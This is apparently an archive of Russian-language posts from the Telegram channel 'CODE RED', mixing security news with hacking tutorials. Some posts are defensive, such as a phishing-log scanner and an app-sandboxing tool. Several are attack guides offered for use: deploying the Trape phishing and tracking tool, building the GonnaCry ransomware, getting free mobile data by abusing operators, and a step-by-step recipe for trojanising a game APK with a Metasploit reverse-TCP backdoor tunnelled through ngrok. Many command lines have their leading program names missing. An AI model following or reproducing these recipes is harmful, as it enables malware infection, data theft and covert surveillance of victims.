Size: a a a

2020 October 28
CODE RED
​​Facebook возглавила рейтинг компаний, собирающих максимум данных о пользователях

Британский производитель антивирусных решений Clario составил рейтинг компаний, собирающих данные пользователей. Речь идет не о стандартных трекинговых технологиях, таких как cookie-файлы, использующиеся для отслеживания посещаемых пользователями сайтов и покупаемых ими товаров с целью таргетинга. Clario создала подробную инфографику, демонстрирующую, какую в точности информацию о пользователях собирают соцсети, online-магазины, стриминговые сервисы и т.д. либо сразу после того, как пользователь на них подписался, либо с течением времени.

Специалисты Clario определили 32 критерия для персональных данных, интересующих компании. Сюда входят электронные адреса, полные имена, сведения о здоровье и близких родственниках, девичью фамилию матери и место рождения. Некоторым компаниям также интересен рост и вес пользователя. Как правило, такие данные запрашивают фитнес-приложения, но есть как минимум один финансовый сервис, тоже запрашивающий подобные сведения. Некоторым приложениям также нужны данные о работе, в том числе о зарплате и прошлых местах работы.

Больше всего данных о пользователях собирает компания Facebook и ее «дочка» Instagram. Из всех 32 критериев данных Facebook собирает 70,59%. Конечно, они нужны компании не только для того, чтобы улучшить опыт пользователей соцсети, но и для таргетированной рекламы. Instagram собирает 58,82% данных, и в отличие от Facebook ее не интересуют данные о расе, семейном положении и сексуальной ориентации.

За Facebook и Instagram следуют приложения для знакомств Tinder и Grindr. Их не интересует столько подробностей о пользователях, как Facebook, зато им нужно знать их рост и подробности о банковских счетах.

#новость
источник
2020 October 29
CODE RED
​​Хозяйка Tesla издевалась над угонщиками через приложение на смартфоне

Этот случай - пример того, как технологии удалённого доступа могут помочь отыскать и немного поиздеваться над угонщиками электрокара Tesla.

Tesla Model 3 просигнализировала владелице Аннабель Бретт о том, что в салон её машины проникли. Бретт не растерялась и отправилась в погоню за злоумышленниками, по пути издеваясь над ними через приложение на смартфоне.

После того, как Аннабель получила уведомление через приложение Tesla Mobile, она отправилась в гараж, где не обнаружила своего электрокара. Приложение также позволяет отследить местоположение машины, чем и воспользовалась потерпевшая, поехав на автомобиле знакомого вместе с ним за угонщиками.

Опять же через Tesla Mobile Аннабель активировала режим "Valet Mode", который позволяет ограничить максимальную скорость на отметке 112 км/ч, а также включать и выключать свет, управлять электростеклоподъёмниками, клаксоном.

Такой психологической атаки преступники не выдержали, остановились и покинули Tesla Model 3. Они так спешили, что один из них оставил в электрокаре водительское удостоверение. Доказать, что оно принадлежит злоумышленнику, не составит труда, ведь у машин Tesla есть режим "Sentry Mode", который включает запись окружающей обстановки в случае угрозы совершения неправомерных действий со стороны окружающих.

#новость
источник
2020 October 30
CODE RED
​​В Москве могут быть взломаны 15000 камер видеонаблюдения

В Москве есть как минимум 15 тыс. скомпрометированных частных камер, сообщил «Известиям» источник в хакерских кругах. Это устройства в квартирах, магазинах, банках, торговых центрах и других частных организациях. О городской системе видеонаблюдения, об утечках из которой ранее сообщал ряд федеральных СМИ, речи не идет.

Доступ к 15 тыс. камер злоумышленники планируют использовать, чтобы создать альтернативную систему распознавания лиц, рассказал источник из хакерских кругов. Уязвимые частные камеры позволяет найти поисковик Shodan. Хакер, используя наводку поисковика, может получить доступ к камерам, пояснил независимый исследователь даркнета Олег Бахтадзе-Карнаухов.

Поток видео с камер можно провести через программы по идентификации лиц, доступные и в обычном интернете, рассказал он.

На записанные видео «натравливается» FindFace или другая технология подобного типа, а результат обработки записывается с каждой камеры в базу данных. Одновременно можно привязать людей к локации. Таким образом накапливаются отметки о гражданах. После того как база данных станет наполненной, хакеру нужно будет лишь загрузить туда для поиска фото искомого человека.

«Таким образом, есть возможность создать аналог ЕЦХД (единый центр хранения и обработки данных, куда попадают записи московской системы видеонаблюдения. — «Известия»)», — подытожил эксперт.

#новость
источник
2020 October 31
CODE RED
​​Бесплатный интернет при отрицательном балансе

В данном посте пойдет речь о уязвимости операторов, которая позволяет бесплатно использовать интернет при отрицательном балансе, с задействованием новых технологий перенаправления трафика.

А именно, мы воспользуемся приложением «TLS Tunne», которое позволяет генерировать уникальный внутренний IP-адрес для каждого подключенного пользователя, тем самым устанавливая связь между пользователями на одном сервере.

Стоит отметить, что исправить данную уязвимость удалось лишь МТС и Tele2. Ситуация с другими операторами потерпела немногие изменения, но они так и не научились фильтровать HTTP/2.

Настройка

1. Первым делом, требуется сменить APN, как это сделать, можно запросто найти в интернете.
2. Затем, устанавливаем на свой смартфон приложение «TLS Tunne».
3. Выбираем настройки под своего оператора и открываем их в приложении.
4. Нажимаем кнопку «Начать».

Спустя некоторое время, приложение автоматически выберет лучший сервер и подключиться к нему. Понять это можно по появившемуся ключику в строке состояния.

Если соединение не удается установить, то можно попробовать сменить порт. Так же, возможно стоит попробовать сменить сервер, благо их достаточное количество. Главное, в случае не удачи, просто экспериментировать.

📌https://4pda.ru/forum/index.php?showtopic=967323

#приложения #android
источник
2020 November 01
CODE RED
​​Trape. Фишинг и слежка за пользователем

С эксплоитами для автоматизации фишинга, получения местонахождения по ссылке и так далее, знакомы многие. Но было бы удобно совместить всех их в один. Trape соответствует этой идее. Он создан для слежки за пользователем в браузере. Механика работы заключается в создании фейковой вебстраницы, при переходе пользователя на которую злоумышленник получает определенные данные(ip, локацию, ОС и т.д.) и может запускать удаленно JS скрипты, загружать файлы на целевой ПК и проводить фишинговые атаки. Рассмотрим Trape на практике.

Установка

Устанавливаем Kali Linux.

Скачиваем репозиторий с github

 clone https://github.com/jofpin/trape.git

Переходим в созданную директорию и устанавливаем необходимые python библиотеки

 -m pip install -r requirements.txt

Использование

Для запуска Trape потребуется одна команда

 trape.py --url <ссылка на вебстраницу> --port <открытый порт>

После переменной url можно ввести абсолютно любую вебстраницу, которая сможет удержать целевого пользователя. Скрипт автоматически сделает копию этой страницы и в итоге в терминале появятся две ссылки. Первая на фейковую вебстраницу, она отправляется жертве. Вторая - это админ панель, куда и будет приходить вся информация. Третье значение - это ключ доступа к админ панели.

При переходе пользователя по ссылке откроется сессия, которую можно будет просматривать в панели управления. Помимо информации о локации и устройстве, интересной фичей также является список сервисов, где зарегистрирован пользователь. Это можно использовать для проведения фишинговых атак. Благодаря возможности выполнять скрипты, которая находится во вкладке "Attacks Hook", можно посылать пользователю в режиме реального времени различные банеры, рекламу, реализовать кейлогер и т.д. Также можно перенаправить его на фишинговый сайт, указав ссылку на форму авторизации для автоматизированного копирования в поле перед кнопкой "Attack".
источник
2020 November 02
CODE RED
​​Google обнародовала данные об уязвимости нулевого дня в Windows до выхода её исправления

Исследователи из команды Google Project Zero, которые работают в сфере информационной безопасности, опубликовали данные об опасной уязвимости нулевого дня в Windows. Уязвимость может использоваться для выхода за пределы песочницы или повышения привилегий внутри системы. Примечательно, что Microsoft планирует устранить проблему только в следующем месяце, когда будет выпущено плановое обновление безопасности.

Речь идёт об уязвимости CVE-2020-17087, которая связана с работой одной из функций Windows Kernel Cryptography Driver (cng.sys) и относится к категории багов переполнения буфера. Исследователи также отмечают, что данная уязвимость активно используется злоумышленниками на практике. Подробности касательно данной уязвимости пока не раскрываются, но исследователи говорят о том, что выявленные случаи её эксплуатации никак не связаны с предстоящими выборами президента США.

Согласно имеющимся данным, уязвимость нулевого дня в Windows эксплуатировалась вместе с уязвимостью CVE-2020-15999 в браузере Google Chrome, которую несколько дней назад обнаружили специалисты Project Zero. Уязвимость Chrome применяется хакерами для выполнения вредоносного кода внутри браузера, тогда как уязвимость Windows делает возможным выход за пределы песочницы Chrome с последующим выполнением кода на уровне системы.

Проблема затрагивает разные версии программной платформы, начиная с Windows 7 и заканчивая недавними стабильными сборками Windows 10. Исправление для CVE-2020-17087 должно быть выпущено Microsoft 10 ноября вместе с плановым обновлением безопасности, выходящим в рамках программы Patch Tuesday. Что касается уязвимости Chrome, то она уже была устранена в последней версии обозревателя.

#новость
источник
2020 November 03
CODE RED
​​Как создать изолированное пространство в смартфоне?

Для пользователей, что ставят свою конфиденциальность превыше всего, разработали полезное приложение, с открытым исходным кодом, которое носит название «Shelter».

Его основной особенностью, является запуска приложения в отдельной, изолированной от всех других программ и ваших данных «песочнице», что равносильно запуску на стороннем устройстве.

Следовательно, пользователь сможет уберечь себя от приложений с вредоносным кодом, которые пытаются следить и воровать данные, а также от «закладок» в самой операционной системе или кастомной прошивке, которая используется.

В дополнении, при помощи Shelter, можно замораживать работоспособность приложений, или клонировать их, в случае, если вам необходимо сразу несколько активных аккаунтов в социальных сетях или сервисах.

📌https://4pda.ru/forum/index.php?showtopic=917380

#приложения #android #безопасность
источник
2020 November 04
CODE RED
​​Киберкомандование США усилило поиск иностранных хакеров перед выборами

Кибернетическое командование США расширило свои зарубежные операции, направленные на поиск иностранных хакерских группировок с целью выявить и предотвратить возможные кибератаки со стороны других правительств.

«С 2018 года мы расширили нашу охоту на всех основных противников. Мы хотим найти плохих парней во вражеском киберпространстве, в их собственной операционной среде. Мы хотим убить лучника, а не уклоняться от стрел», — сообщил в интервью The New York Times заместитель главы киберкомандования Чарльз Л. Мур-младший (Charles L. Moore Jr.).

В прошлом операции Киберкомандования были сосредоточены в основном на России. Но перед выборами в нынешнем году сотрудники разведки рассказали об усилиях не только России, но также Ирана и Китая с целью потенциально повлиять на выборы.

Напомним, в январе нынешнего года Киберкомандование оказалось не готовым к большим объемам данных, полученным в результате взлома информационной инфраструктуры террористической организации ДАИШ (является запрещенной в РФ). Хотя операция по взлому учетных записей и серверов ДАИШ прошла успешно, у Киберкомандования не хватило места для хранения извлеченных материалов.

#новость
источник
2020 November 05
CODE RED
​​Вирус вымогатель для Linux

После пережитых массовых атак шифровальщиками в 2017 году, пользователи и предприятия стали тщательней подходить к защите собственных устройств. Эталоном защищенной операционной системы от вымогателей стал Linux.

Переход на эту ОС частично является выходом, от основных вирусов шифровальщиков WannaCry, Petya или BadRabbit она действительно спасает, но разве не существует подобных для Linux? Существуют, просто не распространены, как и сама операционная система. Делать вирусы вымогатели под Linux не выгодно, поскольку данная ОС работает всего лишь на 1.8% устройств против 88% преподающих на Windows. Так или иначе давайте рассмотрим и убедимся в работе подобного шифровальщика.

Установка и сборка

Тестировать работу вируса нужно на виртуальной машине, в противном случае он может уничтожить важную информацию с основного устройства. Скачаем VirtualBox и установим на неё Kali Linux.

Скачиваем репозиторий с github

 clone https: //github.com/tarcisio-marinho/GonnaCry.git

Переходим в созданную директорию и устанавливаем необходимые библиотеки

 GonnaCry
◽️sudo pip install -r requeriments.txt

Теперь остается собрать вирус. Для этого понадобится Pyinstaller

 pip install pyinstaller

Переходим в папку и начинаем сборку

 GonnaCry
◽️pyinstaller -F --clean main.py -n gonnacry

Создастся файл gonnacry, запустив который все файлы до которых дотянется вирус будут зашифрованы, а обои по традиции заменены на текст с разъяснением произошедшего.

#хакинг #kali
источник
2020 November 06
CODE RED
​​​​Атака deface

Deface переводится с английского, как "искажать" или "уродовать". Соответственно одноименная атака направлена на подмену информации расположенной на целевой вебстранице. Она может быть проведена скрытно, как к примеру подмена платежных данных в статье, или с оглаской, то есть изменение заголовков, интеграция банеров с рекламой, замена картинок и т.д.

Реализуется данная атака различными методами. Начиная от уязвимостей в CMS и заканчивая заменами подгружаемых картинок на серверах. Рассмотрим для примера второй вариант. Один пользователь загружает на свой сайт статью. Второй её успешно копирует оставляя подгрузку картинок с хостинга первого. Это вполне логично, ведь зачем тратить место на своем хостинге, если картинки расположены на чужом. Однако это открывает возможность первому пользователю заменить старую картинку на новую сохранив название. Поскольку тег img подгружает картинки по определенному пути, и неважно, что в один момент там находится изображение с котом, а в другой политическая пропаганда. Данный способ использовался для борьбы с копипастерами ещё в начале нулевых.

Однако и сейчас атака deface является не менее популярной. К примеру, 27 октября был взломан сайт предвыборной компании Дональда Трампа. Злоумышленники оставили только одну страницу, которая была схожа с уведомлением об изъятии домена спецслужбами. Как следует из сообщения, сайт был "захвачен", поскольку "мир устал от фальшивых новостей, ежедневно распространяемых президентом Дональдом Трампом". Сообщение продержалось 30 минут, после чего ресурс возобновил работу.

Также стоит вспомнить о массовом дефейсе в 2017 году. Когда в Wordpress обнаружили уязвимость, которая позволяла изменять содержимое статей путем отправки специальных запросов на сайт. По данной уязвимости действовали тогда примерно 20 хакерских группировок, а общее количество взломанных статей оценивалось в 1.5 млн.
источник
2020 November 07
CODE RED
​​Исходники GitHub выложили на GitHub. В компании отрицают взлом

Администрация сервиса для хостинга IT-проектов и их совместной разработки GitHub вынуждена убеждать своих пользователей в том, что слухи о взломе сервиса не имеют под собой оснований.

Все началось с публикации неизвестным пользователем некоего кода, который, по его словам, является исходным кодом порталов GitHub.com и GitHub Enterprise. Код был добавлен в качестве коммита в раздел GitHub DMCA, причем коммит был сделан так, будто его добавил глава GitHub Нат Фридман (Nat Friedman). Однако, согласно сообщению Фридмана на портале YCombinator Hacker News, он не публиковал код, и GitHub взломан не был.

По словам Фридмана, «утекший исходный код» – это не весь код, а только его часть, относящаяся к продукту GitHub Enterprise Server – локальной версии GitHub.com для команд разработчиков корпоративного ПО. Компании могут развертывать GitHub Enterprise Server на своих серверах для локального хранения своего кода из соображений безопасности и при этом пользоваться всеми функциями полноценного GitHub.

Как пояснил Фридман, утечка исходника GitHub Enterprise Server произошла еще несколько месяцев назад по вине инженеров GitHub, случайно «отправивших некоторым клиентам необработанный/обфусцированный тарбол исходного кода GitHub Enterprise Server». Глава сервиса также пообещал исправить две уязвимости, проэксплуатированные пользователем, опубликовавшим исходный код, которые позволяют неавторизованным сторонам добавлять свой код в чужие проекты под чужим именем.

«Подытожу: все хорошо, ситуация в норме. Птица летит, улитка ползет – и в порядке мир», – написал Фридман.

#новость
источник
2020 November 08
CODE RED
​​Фильтрация рекламных модулей в Android

Для пользователей, что хотят избавиться от повсеместных рекламных баннеров в программах, существует простое решение в виде отдельного приложение, с названием «personalDNSfilter».

DNSfilter является прокси-фильтром, который подключается к разрешению доменного имени(DNS) и возвращает адрес обратной связи для отфильтрованных хостов. Фильтрация осуществляется полностью локально и работает с любым вышестоящим DNS-сервером.

Следовательно, приложение может использоваться для фильтрации рекламы и другого нежелательного контента на основе списка хостов. Таким образом, это хорошая альтернатива известному «AdBlock».

Для того чтобы фильтрация вступила в силу, необходимо сперва выдать все требуемые решения, а затем открыть приложение. После чего, DNSfilter автоматически начнет работу, что можно понять по характерному ключику в строке состояния.

📌https://4pda.ru/forum/index.php?showtopic=1005986

#приложения #android
источник
2020 November 09
CODE RED
​​Каждый третий смартфон на Android с января перестанет открывать многие сайты

Каждый третий смартфон с операционной системой Android в начале следующего года перестанет открывать многие сайты, об этом сообщил центр сертификации Let’s Encrypt.

Организация предоставляет криптографические сертификаты для TLS-шифрования и намерена перейти на собственные корневые сертификаты. При этом распознать их может только версия Android 7.1.1 и выше.

Отмечается, что только 66,2% смартфонов имеют подходящие версии операционной системы. В остальных случаях при открытии ряда сайтов будет выдаваться ошибка.

Разработчики предложили для решения проблемы с доступом использовать браузер Firefox, который самостоятельно хранит корневые сертификаты. Однако он недоступен в версии Android 4.x и может работать только в Android 5.0 или более новых выпусках.

#новость
источник
2020 November 10
CODE RED
​​Идентификация фишинговых ссылок

Внимательность пользователей при переходе по ссылкам для противодействия фишинговым атакам важна, но и сами компании не должны сидеть сложа руки. Сканируя логи сервера на котором расположен сайт, владельцы могут находить подобные фишинговые ссылки и пытаться блокировать или оповещать пользователей о их наличии.

Хорошим софтом для подобного сканирования является PhishingKitHunter. Он анализирует файл журнала сервера на предмет ссылок, которые пытаются скопировать страницы и/или другие файлы с основного сайта. Всю отчетность программа сохраняет в отдельный CSV файл.

Установка

Устанавливаем Kali Linux.

Скачиваем репозиторий с github

 clone https://github.com/t4d/PhishingKitHunter.git

Теперь нужно установить зависимости перейдя в созданную директорию с помощью команд

 PhishingKitHunter/
pip3 install -r requirements.txt

Использование

Опций у программы всего три. Добавление файла журнала осуществляется с помощью ключа -i после которого указывается путь. Для сохранения выходного файла используется -o. Также нужно задать конфигурационный файл с помощью ключа -c.

Пример команды:

./PhishingKitHunter.py -i logs.log -o report.csv -c conf/defaults.conf

Для просмотра отчета можно воспользоваться предустановленной программой cat

cat report.csv

#kali
источник
2020 November 11
CODE RED
​​МВД России потратило 80 млн рублей на средства взлома смартфонов

С начала 2020 года МВД России потратило 80 миллионов рублей на средства взлома смартфонов. Внимание на это обратило «МБХ медиа».

По данным , самую большую сумму — 59,1 миллиона рублей МВД выделило на аппаратно-программные комплексы (АПК). Сообщается, что они могут взламывать телефоны и извлекать из них информацию, включая скрытые и удаленные данные. В среднем один АПК стоит порядка 1,5 миллиона рублей, а покупать их приходится за рубежом.

Еще 15 миллионов рублей ведомство потратило на программу «Мобильный криминалист», которую разработала отечественная компания «Оксиджен Софтвер». Программа позволяет загружать и анализировать сводки от операторов сотовой связи, а также извлекать файлы, логины и пароли.

Третья категория, на которую МВД выделило 3,2 млн рублей — комплекты UFED от израильской компании Cellebrite. Они позволяют взламывать устройства на Android и iOs и скачивать с них данные, включая переписку в мессенджерах.

#новость
источник
2020 November 12
CODE RED
​​Массовый поиск соцсетей пользователя по нику

При проведении OSINT часто бывает полезно идентифицировать как можно больше страниц определенного пользователя в социальных сетях. Обычно юзер придумывает себе только один никнейм. И это вполне может привести к деанонимизации, к примеру, если на определенном форуме и на личной странице в Инстаграм у человека стоит один и тот же ник.  

Это также может использоваться и против предприятий, как для обычного сбора информации, так и для киберсквотинга, то есть регистрации страницы в соцсети с названием бренда для последующей её перепродажи непосредственно основной компании или использования в мошенических схемах.

И так перейдем к практике. В реализации поиска соц сетей по нику нам поможет Userrecon.

Установка и использование

Скрипт работает на Kali Linux.

Скачиваем репозиторий командой

 clone https://github.com/issamelferkh/userrecon.git

Переходим в созданную директорию и ставим права на исполняемый файл

 userrecon 
◽️chmod +x userrecon.sh

Для начала поиска запускаем утилиту командой


После чего прописываем интересующий нас никнейм. Можно также вписать несколько ников через пробел, тогда проверяться они будут по очереди.
источник
2020 November 13
CODE RED
​​Больше всего вредоносов для Android поступает из магазина Google Play

Официальный магазин Google Play Store был определен в качестве основного источника вредоносного ПО для Android-устройств. К такому выводу пришли исследователи из NortonLifeLock (ранее Symantec) и Института программного обеспечения IMDEA в Мадриде, Испания.

Эксперты проанализировали происхождение установок приложений на более чем 12 млн Android-устройств за четырехмесячный период с июня по сентябрь 2019 года. В общей сложности исследователи изучили более 34 млн установок APK для 7,9 млн уникальных приложений. В зависимости от различных классификаций вредоносных программ для Android от 10% до 24% проанализированных приложений могут быть описаны как вредоносные или нежелательные.

Как показали результаты исследования, около 67,5% выявленных установок вредоносных приложений поступали из Google Play Store. На втором месте с показателем в 10% оказались сторонние магазины приложений, опровергнув довольно распространенное мнение об их небезопасности.

#новость
источник
2020 November 14
CODE RED
​​Замена местоположения на смартфоне

На канале CODE RED уже упоминалась возможность подменять местоположение на Android в посте про создание фейковых пробок. Однако давайте разберем эту тему поподробнее. Всем известно, что некоторые приложения отслеживают координаты устройства и это не очень безопасно.

Повысить анонимность можно подменив местоположение, и сделать это возможно с помощью Hola Fake GPS location. Оно находится в PlayMarket.

Настройка и использование

Для начала работы необходимо включить режим разработчика на смартфоне. Сделать это можно перейдя в настройки, далее "О телефоне", в некоторых моделях поле "Номер сборки" находится именно здесь, но чаще всего нужно перейти ещё во вкладку "Сведения о ПО". Собственно найдя пункт "Номер сборки" по нему необходимо кликнуть 7 раз.

Теперь, когда режим разработчика включен можно открыть приложение Hola. При первом запуске нужно будет нажать на появившуюся кнопку "GO". Откроется всплывающее окно, где нужно кликнуть по "Settings". Откроются все те же настройки, где нужно найти пункт "Выбрать приложение для фиктивных местоположений", нажать на него и непосредственно выбрать Hola Fake GPS.

Остается включить определение местоположения только по GPS спутникам. На каждом устройстве это делается по разному, но в пределах вкладки "Местоположение" или "Локация", в общих настройках.

Готово. Теперь можно возвращаться в приложение, вписывать в поиск любое местоположение и начинать подмену нажав кнопку "GO".
источник
2020 November 15
CODE RED
​​Microsoft призвала отказаться от многофакторной аутентификации по телефону

Директор подразделения по безопасности идентификационных данных Microsoft Алекс Вайнерт призвал пользователей отказаться от методов многофакторной аутентификации по телефону, таких как одноразовые SMS-коды и голосовые звонки. Вместо этого он советует прибегнуть к приложениям для аутентификации и ключам безопасности.

В прошлом году Вайнерт цитировал статистику компании, по которой многофакторная аутентификация (MFA) позволяет предотвратить 99,9% автоатак на пользовательские аккаунты Microsoft. Но в одном из свежих постов он пишет, что по возможности юзерам следует остановить свой выбор на MFA-технологиях, которые не задействуют сотовые сети.

Это связано проблемами в их безопасности: телефонные сообщения и звонки могут быть легко перехвачены посредством программно определяемых радиосистем, фемтосот или инструментов для взлома протокола SS7 (ОКС-7), используемого для маршрутизации звонков и передачи SMS. Одноразовые коды можно украсть с помощью опенсорсных сервисов Modlishka, CredSniper и Evilginx.

Кроме того, злоумышленники могут завладеть кодами при помощи SIM-свопинга, обманом заставив сотрудников мобильного оператора перевыпустить SIM-карту жертвы от её имени. После активации новой SIM-карты с номером жертвы на собственном телефоне хакер получает доступ к любому сервису, к которому привязана проверка по номеру телефона.

Вайнерт называет звонки и сообщения самым небезопасным способом многофакторной аутентификации. По его мнению, в дальнейшем их надёжность будет только снижаться. Неплохой альтернативой будет приложение Microsoft Authenticator, но лучше всего пользоваться физическими ключами безопасности, говорит Вайнерт.

#новость
источник
2020 November 16
CODE RED
​​Как создать вирус удаленного доступа на Android 10

Попутно тому, как смартфоны становятся частью человеческой жизни, возникает все больше новых зловредных программ ориентированных под мобильные операционные системы. И если раньше можно было не переживать, качая софт только с официального магазина, то теперь злоумышленники научились обходить и профессиональные системы идентификации вирусов.

Разновидностей зловредов стало также больше. Под Андроид появились свои шифровальщики, стиллеры и бекдоры. О последних сегодня и пойдет речь. В качестве демонстрации будет представлен процесс создания вируса удаленного доступа, только не с помощью вспомогательных программ, а своими руками. Заражать будем тестовый apk файл с игрой.

Установка необходимых компонентов

Устанавливаем Kali Linux.

Далее установим Zipalign

 apt-get install -y zipalign

Ещё нам понадобятся программы keytool и jarsigner, которые находятся в Java SDK. Утилиту Apktool можно скачать запустив этот файл. Также понадобятся предустановленные ngrok и Metasploit.

Сборка бекдора

Запускаем в отдельном окне ngrok

 tcp 4444

Полученные lhost и lport используем для создания пейлоада

 -p android/meterpreter/reverse_tcp LHOST=<адресс lhost> LPORT=<значение lport>M> /home/kali/payload.apk

На выходе получаем apk файл. Его и файл игры, в которую будем вшивать вирус, нужно распаковать с помощью комманд

 d game.apk 
◽️apktool d payload.apk

Теперь остается преобразить загрузочный файл бекдора. Копируем папку metasploit по пути /payload/smali/com/ в /game/smali/com/. Теперь переходим в папку /game/smali/com/dotgears/game/ и открываем файл SplashScreen.smali. В нем находим метку "virtual methods" и после строки начинающейся на invoke-super, то есть на строку под номером 34, вставляем

 {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

Теперь нужно обновить запрос разрешений при установке. Для этого переходим в папку payload и из файла AndroidManifest.xml копируем все теги uses-permission. Вставляем их в аналогичный файл AndroidManifest.xml в папке game, удалив при этом находящиеся там теги uses-permission.

Компилируем отредактированный файл игры в apk

 b game

Готовый файл нужно искать в game/dist/. Остается его подписать. Генерируем подпись коммандой

 -genkey -V -keystore key.keystore -alias codered -keyalg RSA -keysize 2048 -validity 1000

Получаем файл key.keystore. Теперь сертифицируем наш apk

 -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore game.apk codered

Выравниваем подписанное приложение командой

 -v 4 game.apk game_good.apk

Готово! Теперь можно захватывать сессию на целевом смартфоне отослав туда данный apk файл. Атакуемое устройство, в нашем случае, должно находиться в локальной сети с атакующим, поскольку мы изначально в целях демонстрации выбрали такие параметры в ngrok.
источник